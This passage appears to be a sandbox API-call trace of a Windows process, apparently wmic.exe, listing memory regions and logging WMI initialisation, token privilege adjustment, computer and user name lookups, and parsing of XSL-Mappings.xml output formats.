entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2599
start_va = 0x1f70000
end_va = 0x1f70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f70000"
filename = ""
Region:
id = 2600
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2601
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2602
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2604
start_va = 0x1f80000
end_va = 0x1fa3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f80000"
filename = ""
Region:
id = 3122
start_va = 0x7fef7850000
end_va = 0x7fef7866fff
monitored = 0
entry_point = 0x7fef785eba0
region_type = mapped_file
name = "wmi2xml.dll"
filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")
Region:
id = 3123
start_va = 0x2d40000
end_va = 0x2e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d40000"
filename = ""
Region:
id = 3124
start_va = 0x7fef4ae0000
end_va = 0x7fef4b79fff
monitored = 1
entry_point = 0x7fef4aee1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 3125
start_va = 0x1f80000
end_va = 0x1f9afff
monitored = 0
entry_point = 0x1fb6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 3126
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 3127
start_va = 0x1fa0000
end_va = 0x1fa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 3128
start_va = 0x2f10000
end_va = 0x351cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f10000"
filename = ""
Thread:
id = 117
os_tid = 0xdf0
[0400.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9f0 | out: lpSystemTimeAsFileTime=0x16f9f0*(dwLowDateTime=0x6564600, dwHighDateTime=0x1dab599))
[0400.381] GetCurrentProcessId () returned 0xdec
[0400.381] GetCurrentThreadId () returned 0xdf0
[0400.381] GetTickCount () returned 0x142c0b5
[0400.381] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9f8 | out: lpPerformanceCount=0x16f9f8*=2128107855735) returned 1
[0400.382] GetModuleHandleW (lpModuleName=0x0) returned 0xffa30000
[0400.382] __set_app_type (_Type=0x1)
[0400.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa7ced0) returned 0x0
[0400.383] __wgetmainargs (in: _Argc=0xffaa2380, _Argv=0xffaa2390, _Env=0xffaa2388, _DoWildCard=0, _StartInfo=0xffaa239c | out: _Argc=0xffaa2380, _Argv=0xffaa2390, _Env=0xffaa2388) returned 0
[0400.384] ??0CHString@@QEAA@XZ () returned 0xffaa2ab0
[0400.384] malloc (_Size=0x30) returned 0x205b20
[0400.385] malloc (_Size=0x70) returned 0x207bc0
[0400.385] malloc (_Size=0x50) returned 0x207c40
[0400.385] malloc (_Size=0x30) returned 0x207ca0
[0400.385] malloc (_Size=0x48) returned 0x207ce0
[0400.385] malloc (_Size=0x30) returned 0x207d30
[0400.385] malloc (_Size=0x30) returned 0x207d70
[0400.385] ??0CHString@@QEAA@XZ () returned 0xffaa2f58
[0400.385] malloc (_Size=0x30) returned 0x207db0
[0400.385] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0400.386] SetConsoleCtrlHandler (HandlerRoutine=0xffa75724, Add=1) returned 1
[0400.387] _onexit (_Func=0xffa8f378) returned 0xffa8f378
[0400.387] _onexit (_Func=0xffa8f490) returned 0xffa8f490
[0400.387] _onexit (_Func=0xffa8f4d0) returned 0xffa8f4d0
[0400.388] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0400.388] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0400.398] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0400.674] CoCreateInstance (in: rclsid=0xffa373a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa37370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffaa2940 | out: ppv=0xffaa2940*=0x26cc20) returned 0x0
[0400.714] GetCurrentProcess () returned 0xffffffffffffffff
[0400.714] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f7c0 | out: TokenHandle=0x16f7c0*=0x108) returned 1
[0400.714] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f7b8 | out: TokenInformation=0x0, ReturnLength=0x16f7b8) returned 0
[0400.714] malloc (_Size=0x40) returned 0x207f00
[0400.715] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x207f00, TokenInformationLength=0x40, ReturnLength=0x16f7b8 | out: TokenInformation=0x207f00, ReturnLength=0x16f7b8) returned 1
[0400.715] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x207f00*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=1576662806, Attributes=0x9852))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0400.715] free (_Block=0x207f00)
[0400.715] CloseHandle (hObject=0x108) returned 1
[0400.715] malloc (_Size=0x40) returned 0x207f00
[0400.715] malloc (_Size=0x40) returned 0x207f50
[0400.715] malloc (_Size=0x40) returned 0x2065e0
[0400.716] malloc (_Size=0x20a) returned 0x206630
[0400.716] GetSystemDirectoryW (in: lpBuffer=0x206630, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0400.716] free (_Block=0x206630)
[0400.716] malloc (_Size=0x18) returned 0x207fa0
[0400.716] malloc (_Size=0x18) returned 0x34dfa0
[0400.716] malloc (_Size=0x18) returned 0x206630
[0400.716] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0400.716] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0400.717] memcpy (in: _Dst=0x2742a8, _Src=0x271458, _Size=0x28 | out: _Dst=0x2742a8) returned 0x2742a8
[0400.717] memcpy (in: _Dst=0x2742ce, _Src=0x271498, _Size=0x1c | out: _Dst=0x2742ce) returned 0x2742ce
[0400.717] free (_Block=0x207fa0)
[0400.717] free (_Block=0x34dfa0)
[0400.717] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77660000
[0400.717] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadUILanguage") returned 0x776761e0
[0400.717] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0400.718] FreeLibrary (hLibModule=0x77660000) returned 1
[0400.718] free (_Block=0x206630)
[0400.718] _vsnwprintf (in: _Buffer=0x2065e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f3e8 | out: _Buffer="ms_409") returned 6
[0400.718] malloc (_Size=0x20) returned 0x34dfa0
[0400.718] GetComputerNameW (in: lpBuffer=0x34dfa0, nSize=0x16f7c0 | out: lpBuffer="Q9IATRKPRH", nSize=0x16f7c0) returned 1
[0400.719] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.719] malloc (_Size=0x16) returned 0x207fa0
[0400.719] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.719] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16f7b8 | out: lpNameBuffer=0x0, nSize=0x16f7b8) returned 0x7fffffde000
[0400.722] GetLastError () returned 0xea
[0400.722] malloc (_Size=0x2c) returned 0x206630
[0400.722] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x206630, nSize=0x16f7b8 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x16f7b8) returned 0x1
[0400.722] lstrlenW (lpString="") returned 0
[0400.722] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0400.728] lstrlenW (lpString=".") returned 1
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2=".", cchCount2=1) returned 3
[0400.728] lstrlenW (lpString="LOCALHOST") returned 9
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="LOCALHOST", cchCount2=9) returned 3
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="Q9IATRKPRH", cchCount2=10) returned 2
[0400.728] free (_Block=0x207fa0)
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x16) returned 0x207fa0
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x16) returned 0x206670
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x8) returned 0x206690
[0400.729] malloc (_Size=0x18) returned 0x2066b0
[0400.729] malloc (_Size=0x30) returned 0x2066d0
[0400.729] malloc (_Size=0x18) returned 0x206710
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] malloc (_Size=0x30) returned 0x206730
[0400.730] malloc (_Size=0x18) returned 0x206770
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] malloc (_Size=0x30) returned 0x206790
[0400.730] malloc (_Size=0x18) returned 0x2067d0
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.731] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] malloc (_Size=0x30) returned 0x2067f0
[0400.731] malloc (_Size=0x18) returned 0x206830
[0400.731] malloc (_Size=0x30) returned 0x206850
[0400.731] malloc (_Size=0x18) returned 0x206890
[0400.731] SysStringLen (param_1="NONE") returned 0x4
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="NONE") returned 0x4
[0400.732] malloc (_Size=0x30) returned 0x2068b0
[0400.732] malloc (_Size=0x18) returned 0x2068f0
[0400.732] SysStringLen (param_1="CONNECT") returned 0x7
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] malloc (_Size=0x30) returned 0x206910
[0400.732] malloc (_Size=0x18) returned 0x206950
[0400.732] SysStringLen (param_1="CALL") returned 0x4
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="CALL") returned 0x4
[0400.732] SysStringLen (param_1="CONNECT") returned 0x7
[0400.732] malloc (_Size=0x30) returned 0x206970
[0400.733] malloc (_Size=0x18) returned 0x2069b0
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] SysStringLen (param_1="NONE") returned 0x4
[0400.733] SysStringLen (param_1="NONE") returned 0x4
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] malloc (_Size=0x30) returned 0x208000
[0400.733] malloc (_Size=0x18) returned 0x206dd0
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="NONE") returned 0x4
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="PKT") returned 0x3
[0400.734] SysStringLen (param_1="PKT") returned 0x3
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] malloc (_Size=0x30) returned 0x208040
[0400.734] malloc (_Size=0x18) returned 0x206df0
[0400.734] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.734] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.734] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] SysStringLen (param_1="PKT") returned 0x3
[0400.735] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.735] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.735] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] malloc (_Size=0x30) returned 0x208080
[0400.735] malloc (_Size=0x40) returned 0x206e10
[0400.735] malloc (_Size=0x20a) returned 0x208fd0
[0400.735] GetSystemDirectoryW (in: lpBuffer=0x208fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0400.736] free (_Block=0x208fd0)
[0400.736] malloc (_Size=0x18) returned 0x206e60
[0400.736] malloc (_Size=0x18) returned 0x209000
[0400.736] malloc (_Size=0x18) returned 0x209020
[0400.736] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0400.736] SysStringLen (param_1="\\wbem\\") returned 0x6
[0400.736] memcpy (in: _Dst=0x2566c8, _Src=0x271498, _Size=0x28 | out: _Dst=0x2566c8) returned 0x2566c8
[0400.736] memcpy (in: _Dst=0x2566ee, _Src=0x270ac8, _Size=0xe | out: _Dst=0x2566ee) returned 0x2566ee
[0400.736] free (_Block=0x206e60)
[0400.736] free (_Block=0x209000)
[0400.737] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0400.737] free (_Block=0x209020)
[0400.737] malloc (_Size=0x18) returned 0x209020
[0400.737] malloc (_Size=0x18) returned 0x209000
[0400.737] malloc (_Size=0x18) returned 0x209040
[0400.737] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0400.737] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0400.737] memcpy (in: _Dst=0x274928, _Src=0x256718, _Size=0x34 | out: _Dst=0x274928) returned 0x274928
[0400.737] memcpy (in: _Dst=0x27495a, _Src=0x271498, _Size=0x22 | out: _Dst=0x27495a) returned 0x27495a
[0400.738] free (_Block=0x209020)
[0400.738] free (_Block=0x209000)
[0400.738] GetCurrentThreadId () returned 0xdf0
[0400.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f0c0 | out: phkResult=0x16f0c0*=0x10c) returned 0x0
[0400.738] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f110, lpcbData=0x16f0b0*=0x400 | out: lpType=0x0, lpData=0x16f110*=0x30, lpcbData=0x16f0b0*=0x4) returned 0x0
[0400.738] _wcsicmp (_String1="0", _String2="1") returned -1
[0400.738] _wcsicmp (_String1="0", _String2="2") returned -2
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f0b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f0b0*=0x42) returned 0x0
[0400.739] malloc (_Size=0x86) returned 0x206e60
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x206e60, lpcbData=0x16f0b0*=0x42 | out: lpType=0x0, lpData=0x206e60*=0x25, lpcbData=0x16f0b0*=0x42) returned 0x0
[0400.739] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0400.739] malloc (_Size=0x42) returned 0x206ef0
[0400.739] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f110, lpcbData=0x16f0b0*=0x400 | out: lpType=0x0, lpData=0x16f110*=0x36, lpcbData=0x16f0b0*=0xc) returned 0x0
[0400.739] _wtol (_String="65536") returned 65536
[0400.739] free (_Block=0x206e60)
[0400.739] RegCloseKey (hKey=0x0) returned 0x6
[0400.739] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f5b8 | out: ppv=0x16f5b8*=0x21371d0) returned 0x0
[0400.806] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21371d0, xmlSource=0x16f700*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x206e60), isSuccessful=0x16f770 | out: isSuccessful=0x16f770*=0xffff) returned 0x0
[0401.209] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21371d0, DOMElement=0x16f5b0 | out: DOMElement=0x16f5b0*=0x213bc50) returned 0x0
[0401.210] malloc (_Size=0x18) returned 0x209000
[0401.210] IXMLDOMElement:getElementsByTagName (in: This=0x213bc50, tagName="XSLFORMAT", resultList=0x16f5c0 | out: resultList=0x16f5c0*=0x2139cc0) returned 0x0
[0401.211] free (_Block=0x209000)
[0401.211] IXMLDOMNodeList:get_length (in: This=0x2139cc0, listLength=0x16f788 | out: listLength=0x16f788*=21) returned 0x0
[0401.212] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=0, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.213] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.214] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.214] malloc (_Size=0x18) returned 0x209000
[0401.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.214] free (_Block=0x209000)
[0401.214] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x80070001c)) returned 0x0
[0401.214] malloc (_Size=0x18) returned 0x209000
[0401.215] malloc (_Size=0x18) returned 0x209020
[0401.215] malloc (_Size=0x30) returned 0x2080c0
[0401.215] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.215] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.215] IUnknown:Release (This=0x213a280) returned 0x0
[0401.215] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=1, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.216] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.216] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.216] malloc (_Size=0x18) returned 0x209060
[0401.216] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.216] free (_Block=0x209060)
[0401.216] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x80070001c)) returned 0x0
[0401.216] malloc (_Size=0x18) returned 0x209060
[0401.216] malloc (_Size=0x18) returned 0x209080
[0401.216] SysStringLen (param_1="VALUE") returned 0x5
[0401.216] SysStringLen (param_1="TABLE") returned 0x5
[0401.217] SysStringLen (param_1="TABLE") returned 0x5
[0401.217] SysStringLen (param_1="VALUE") returned 0x5
[0401.217] malloc (_Size=0x30) returned 0x208100
[0401.217] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.217] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.217] IUnknown:Release (This=0x213a280) returned 0x0
[0401.217] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=2, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.217] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.217] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.217] malloc (_Size=0x18) returned 0x2090a0
[0401.217] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.218] free (_Block=0x2090a0)
[0401.218] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x80070001c)) returned 0x0
[0401.218] malloc (_Size=0x18) returned 0x2090a0
[0401.221] malloc (_Size=0x18) returned 0x2090c0
[0401.221] SysStringLen (param_1="LIST") returned 0x4
[0401.221] SysStringLen (param_1="TABLE") returned 0x5
[0401.222] malloc (_Size=0x30) returned 0x208140
[0401.222] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.222] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.222] IUnknown:Release (This=0x213a280) returned 0x0
[0401.222] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=3, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.222] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="rawxml.xsl") returned 0x0
[0401.222] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.222] malloc (_Size=0x18) returned 0x2090e0
[0401.223] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.223] free (_Block=0x2090e0)
[0401.223] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x80070001c)) returned 0x0
[0401.223] malloc (_Size=0x18) returned 0x2090e0
[0401.223] malloc (_Size=0x18) returned 0x209100
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.223] SysStringLen (param_1="TABLE") returned 0x5
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.223] SysStringLen (param_1="LIST") returned 0x4
[0401.223] SysStringLen (param_1="LIST") returned 0x4
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.224] malloc (_Size=0x30) returned 0x208180
[0401.224] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.224] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.224] IUnknown:Release (This=0x213a280) returned 0x0
[0401.224] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=4, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.224] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.224] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.224] malloc (_Size=0x18) returned 0x209120
[0401.224] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.225] free (_Block=0x209120)
[0401.225] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x80070001c)) returned 0x0
[0401.225] malloc (_Size=0x18) returned 0x209120
[0401.225] malloc (_Size=0x18) returned 0x209140
[0401.225] SysStringLen (param_1="HTABLE") returned 0x6
[0401.225] SysStringLen (param_1="TABLE") returned 0x5
[0401.225] SysStringLen (param_1="HTABLE") returned 0x6
[0401.225] SysStringLen (param_1="LIST") returned 0x4
[0401.225] malloc (_Size=0x30) returned 0x2081c0
[0401.226] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.226] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.226] IUnknown:Release (This=0x213a280) returned 0x0
[0401.226] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=5, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.226] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="hform.xsl") returned 0x0
[0401.226] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.226] malloc (_Size=0x18) returned 0x209160
[0401.226] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.226] free (_Block=0x209160)
[0401.227] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x80070001c)) returned 0x0
[0401.227] malloc (_Size=0x18) returned 0x209160
[0401.227] malloc (_Size=0x18) returned 0x209180
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
[0401.227] SysStringLen (param_1="TABLE") returned 0x5
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
[0401.227] SysStringLen (param_1="LIST") returned 0x4
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
